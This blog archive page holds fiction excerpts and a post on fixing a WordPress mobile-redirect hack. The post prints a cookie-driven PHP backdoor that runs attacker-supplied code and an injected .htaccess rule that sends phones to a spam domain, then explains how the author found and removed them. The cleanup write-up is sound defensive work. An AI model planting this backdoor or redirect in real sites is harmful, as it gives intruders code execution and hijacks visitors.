Skip to content

Month: October 2017

Growing Up With Alexa – 6 months

El Matador has never known a house (or world) without Alexa. By the time he was born, Alexa was almost two years old, and in his first half-year of life, she has been a constant companion, assistant, and soothing voice. Although he can’t interact with Alexa directly, he does hear her voice, and he hears us talking to her, which leads me to wonder how his relationship with this technology will progress. 

The Chip Job

The last thing Danny needed was a history lesson on Austin, Texas. He knew the city’s love-hate relationship with the tech companies that had built it up only to abandon it in its time of need. He knew hundreds of disheveled engineers showed up on its doorstep every day with their student loans and CCNA certificates hoping for a job with one of the few tech companies that remained. They flocked to the campuses of Dell, Pattrn, and Nixle Chronos, but more often than not ended up in Old Downtown with all the rest of the unused talent.

Fixing a WordPress Redirect Hack

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device. The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into think you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, javascript debugger, etc., but found nothing! The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder. I found this file and couldn’t figure out what it did. daniel@bffserver [~]# cat psvkwrmv.php.fart –?php $oewzo=$_COOKIE; $ycke=$oewzo[zutc]; if($ycke){ $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf(“”,$gpjc);$fyup(); I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory. Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory: RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC] RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L] You son of a bitch .htaccess file! Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this: dverast@dougherty:~/danielverastiqui.com$ cat .htaccess # BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] If you need to find all the affected .htaccess files quickly, you can use grep: daniel@bffserver [~]# grep -lR “luxurytds.com” . grep: ./access-logs: No such file or directory ./www/blog/backup-1408304576-wp-admin/.htaccess ./www/blog/backup-1408304576-wp-includes/.htaccess ./www/blog/backup-1500088171-wp-admin/.htaccess ./www/blog/backup-1500088171-wp-includes/.htaccess ./www/blog/wp-content/backup-1500088171-themes/.htaccess ./www/blog/wp-content/backup-1408304576-themes/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/.htaccess ./www/blog/wp-content/backup-1408304576-plugins/.htaccess ./www/cgi-bin/.htaccess ./public_html/blog/backup-1408304576-wp-admin/.htaccess ./public_html/blog/backup-1408304576-wp-includes/.htaccess ./public_html/blog/backup-1500088171-wp-admin/.htaccess ./public_html/blog/backup-1500088171-wp-includes/.htaccess ./public_html/blog/wp-content/backup-1500088171-themes/.htaccess ./public_html/blog/wp-content/backup-1408304576-themes/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess ./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess ./public_html/cgi-bin/.htaccess After I deleted every .htaccess file and replaced them with defaults or recommended, the site stopped redirecting. Success! However: I still don’t know exactly how the .htaccess files were being invoked. I mean, I kinda do, but in a much more real way, I have no idea. Would be interested to know for sure.…

Is It Novel Yet?

Almost as soon as I call a novel finished and ready for publication, I start on the next one. I think everyone does. And like a lot of other writers, I don’t really have a new story in mind. It’s just an idea. One of hundreds. And each one needs to be investigated to see if it contains a story. For months, a year, maybe more, I investigate each of these slivers of ideas and try to stretch them like a ball of dough into something resembling a pizza. It doesn’t always work, and sometimes it is hard to tell when I’m not good enough to write the story, if I’m just being lazy, or if there simply isn’t a story there. I try to stay pragmatic, not get too overexcited, but at some point, you just can’t deny you’ve got the beginning of a novel on your hands.

Johnny’s Loop

When he was fifteen years old, Johnny San Vito logged into a military-sponsored, virtual reality BBS using his dad’s account and threatened to beat the shit out of an Airman who went by the ultra-cool handle Raw Dawg. I was right there along with him too, using my dad’s account, but to this day I’m ninety percent sure it was Johnny who started the whole mess. And when Raw Dawg went crying to his superiors, it was our dads who got called in for disciplinary meetings. I don’t know how or if Johnny ever got punished for getting his dad in trouble, but I had my immersion rig taken away for three months.

Applied Harmonics

To understand the scope of Applied Harmonics’ work, you have to look at the startup scene in Austin, Texas around the mid-90’s, back before the scene itself had a name. Around that time, Austin was seeing an influx of Californian money, most of it by way of rich West Coasters who fled the high cost of living for the laid back, BBQ and beer lifestyle of the Live Music Capital of the World. They took the foundations of Silicon Valley and started rebuilding it here.

We here at Deadline Avoidance renew our commitment to fight the real issues plaguing our country.

Recent Reviews

Perion Synthetics is a book that raises some interesting questions involving synthetic life living alongside “real” life. There is a faint flavor of “I, Robot” in parts of this, but this story definitely goes its own way.

Pheel – Perion Synthetics

Maybe this is where VR is heading. Are you ready for VR can you survive such mind control. Do you want to control all you see? The new world order is heavy with opportunity.

Gerald A. Mills – Veneer
© 2018 Daniel Verastiqui